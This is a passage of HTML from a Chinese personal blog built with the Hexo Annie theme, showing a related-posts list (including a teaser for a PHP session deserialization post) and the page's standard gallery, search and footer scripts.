session又被称为会话控制  和cookie类似 用于保持会话的但是cookie一般是存储再客户端的 session一般是存储在服务端的
在PHP中 有一个php_session变量 用...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2026/03/10/session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95/" title="session反序列化漏洞测试">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/images/covers/lijiangyuan.jpg" alt="session反序列化漏洞测试"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/02/16/%E6%9C%AA%E5%91%BD%E5%90%8D/" title="好东西">
								好东西			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								二月 16日, 2026				
							</p>
							<p class="relate-post-content">
								hello world

							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2026/02/16/%E6%9C%AA%E5%91%BD%E5%90%8D/" title="好东西">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/cart_cover.jpg" alt="好东西"/>
							</a>
						</div>
					</li>												
			
		</ul>
	
</div>	
				</div>
				<div class="investment-content-list">
					<div class="layout-comment">

	
		<div class="config-info">
			Please check the parameter of <b>comment</b> in config.yml of hexo-theme-Annie!
		</div>	
	

</div>
				</div>
				<div class="investment-content-list">
					<div class="layout-share">
	
	

		
			
			<!-- socialShare share -->
			<div class="social-share"></div>

<!--  css & js -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">
<script async src="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>
			
		
		
	
</div>


				</div>
			</div>	
		</div>
	</div>
</div>

<!-- show math formula -->



	





<link rel="stylesheet" href="/plugin/fancybox/jquery.fancybox.css">


<script src="/plugin/fancybox/jquery.fancybox.js"></script>


<script type="text/javascript">
	(function gallerySet(){
		let titleID = $('.article-title a'),
			imageID = $('.article-content img'),
			videoID = $('.article-content video');
		
		let postTitle = titleID.text() ? titleID.text() : "No post title!";
		
		imageID.each(function() {
			let imgPath = $(this).attr('src'),
				imgTitle = $(this).attr('alt') ? $(this).attr('alt') : "No image description!";
		
			//给每个匹配的<img>元素打包, 即添加父元素<a>
			$(this).wrap('<a data-fancybox="gallery" data-caption="《 ' + postTitle + ' 》' + imgTitle + '"href="' + imgPath + '"> </a>');
		});
		
		videoID.each(function() {
			let videoPath = $(this).attr('src');
		
			//给每个匹配的<img>元素打包, 即添加父元素<a>
			$(this).wrap('<a data-fancybox href=" ' + videoPath + ' "> </a>');
		});
		
		//TODO：支持html5 video

		if($('#layout-post').length) {
			$('[data-fancybox="gallery"]').fancybox({
				loop: true,
				buttons: [
					"zoom",
					"share",
					"slideShow",
					"fullScreen",
					//"download",
					"thumbs",
					"close"
				],
				protect: true
			});
		}
	})();
</script>
		</main>

		<!--footer-->
		<footer>
	<div id="navigation-show">
		<ul id="global-nav">
	
		<li class="menu-home">
			<a href="/" class="menu-item-home" target="_blank">主页</a>
		</li>
		
	
		<li class="menu-archive">
			<a href="/archives" class="menu-item-archive" target="_blank">归档</a>
		</li>
		
	
		<li class="menu-categories">
			<a href="/categories" class="menu-item-categories" target="_blank">分类</a>
		</li>
		
	
		<li class="menu-tags">
			<a href="/tags" class="menu-item-tags" target="_blank">标签</a>
		</li>
		
	
		<li class="menu-about">
			<a href="/about" class="menu-item-about" target="_blank">关于</a>
		</li>
		
	
		<li class="menu-gallery">
			<a href="/gallery" class="menu-item-gallery" target="_blank">相册</a>
		</li>
		
	

	
		<li class="menu-search">
			<a href="javascript:;" class="popup-trigger">搜索</a>
		</li>
	
</ul>
	</div>

	<div class="copyright">
		<p>
			 
				&copy;2025 - 2026, content by Su@sU. All Rights Reserved.
			
			
				<a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> Theme <a href="https://github.com/Sariay/hexo-theme-Annie" title="Annie" target="_blank" rel="noopener">Annie</a> by Sariay.
			
		</p>
		<p>
			

	<!-- busuanzi -->
	<!-- busuanzi -->



			<a href="javascript:zh_tran('s');" class="zh_click" id="zh_click_s">简体</a> 
			<a href="javascript:zh_tran('t');" class="zh_click" id="zh_click_t">繁體</a>				
		</p>
	</div>		
</footer>
		
	<!-- Local or hitokoto! -->

	
<script src="/plugin/motto/motto.js"></script>

	
	<script type="text/javascript">
		(function motto(){
			let mottoText = getMingYanContent().split('</br> - </br>'),
			
			mottoTextContent = mottoText[0]?mottoText[0]:'请刷新...',
			
			mottoTextFrom = mottoText[1]?mottoText[1]:'one/一个';
			
			mottoTextContent = mottoTextContent.trim().substring(0, 100);
		
			$("#motto-content").html( mottoTextContent);
			$("#motto-author").html( mottoTextFrom  );
		})();	
	</script>	



<!-- love effect -->

	
<script src="/plugin/love/love.js"></script>



<!-- back to top -->

	<div id="totop">
	<span class="icon-circle-up"></span>
</div>



<!-- site analysis -->


	<!-- site-analysis -->
	
	
	
	
	
 

<!-- leancloud -->


	<!-- leancloud -->
	<!--
	时间：2018-11-27
	描述：
		文章访问量：visitors
		文章喜欢量：likes	
		文章排行榜：topNPost
		其他得说明：
			01-Cookie相关的函数 
				https://blog.csdn.net/somehow1002/article/details/78511541（Author：somehow1002）
			02-visitors相关的函数 
				https://blog.csdn.net/u013553529/article/details/63357382（Author：爱博客大伯）
				https://notes.doublemine.me/2015-10-21-为NexT主题添加文章阅读量统计功能.html（Author：夏末）
			03-topNPost相关的函数
				https://hoxis.github.io/hexo-next-read-rank.html（Author：hoxis）
			04-likes相关的函数，
				参考了01 & 02进行简单的设计与实现
-->


	

  

	<!--
	时间：2018-10-3
	描述：
		插件名称：hexo-generator-search-zip
		插件来源: https://github.com/SuperKieran/hexo-generator-search-zip
		代码参考：https://github.com/SuperKieran/TKL/blob/master/layout/_partial/search.ejs(Include: js & css)	
-->
<div class="popup search-popup local-search-popup scrollbar" >
	<div class="local-search-container">
		<span class="popup-btn-close">
      		ESC
   		</span>
		<div class="local-search-header">
			<div class="input-prompt">				
			</div>
			<input autocomplete="off" placeholder="Search..." type="text" id="local-search-input">
		</div>
		<div class="local-search-body">
			<div id="local-search-output"></div>
		</div>
		<div class="local-search-footer">
			<div class="topN-post">				
				
								
			</div>
		</div>
	</div>
</div>


<script src="/plugin/search/ziploader.js"></script>
<script src="/js/search.js"></script>


<script type="text/javascript">
	var search_path = 'search.xml',
		zip_Path = '/',
		version_Path = '/',
		input_Trigger = 'auto',
		top_N = '2';

	themeLocalSearch({
		search_path, 
		zip_Path, 
		version_Path, 
		input_Trigger, 
		top_N
	});
</script>



<script src="/plugin/chinese/chinese.js"></script>
<script src="/plugin/imagelazyloader/yall.min.js"></script>
<script src="/plugin/imageloaded/imagesloaded.pkgd.min.js"></script>
<script src="/plugin/nicescroll/jquery.nicescroll.js"></script>
<script src="/plugin/resizediv/resizediv.js"></script>
<script src="/js/main.js"></script>

	</body>	
</html>